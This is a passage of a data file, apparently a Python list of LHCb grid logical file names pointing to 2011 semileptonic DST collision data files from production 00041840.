'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068110_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028139_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031793_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020606_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022127_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041737_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015312_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011207_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003085_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054514_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050629_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042558_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001139_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061471_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062920_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000519_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058986_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050828_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037412_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046474_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002085_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010359_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050819_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055363_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016305_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023230_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054872_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046962_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054824_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050966_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011616_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006153_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005009_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069081_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059194_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017900_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002297_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017811_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003933_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064923_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007806_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056032_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050048_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054571_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054894_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052692_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065146_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026026_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049882_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008101_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055677_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012158_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042557_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006333_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020204_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008408_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001464_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047962_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012431_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007820_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026570_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058372_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026274_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017063_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064750_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027400_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041272_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054581_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055081_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042441_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006662_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018743_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008944_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031586_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067878_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034305_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004563_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066281_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008603_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062024_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054317_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065616_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010187_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010880_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060488_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059100_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037981_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037062_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044655_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022404_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012294_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044260_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027590_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009596_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036192_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031150_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062381_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026300_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047369_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059616_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004457_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002255_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067194_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053203_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060984_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017530_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009333_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049739_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025233_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010028_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055519_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022727_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043578_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039147_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021177_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042870_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021363_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042431_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008475_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001548_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015114_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059355_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055133_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004244_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058624_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025748_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005329_1.semileptonic.dst',
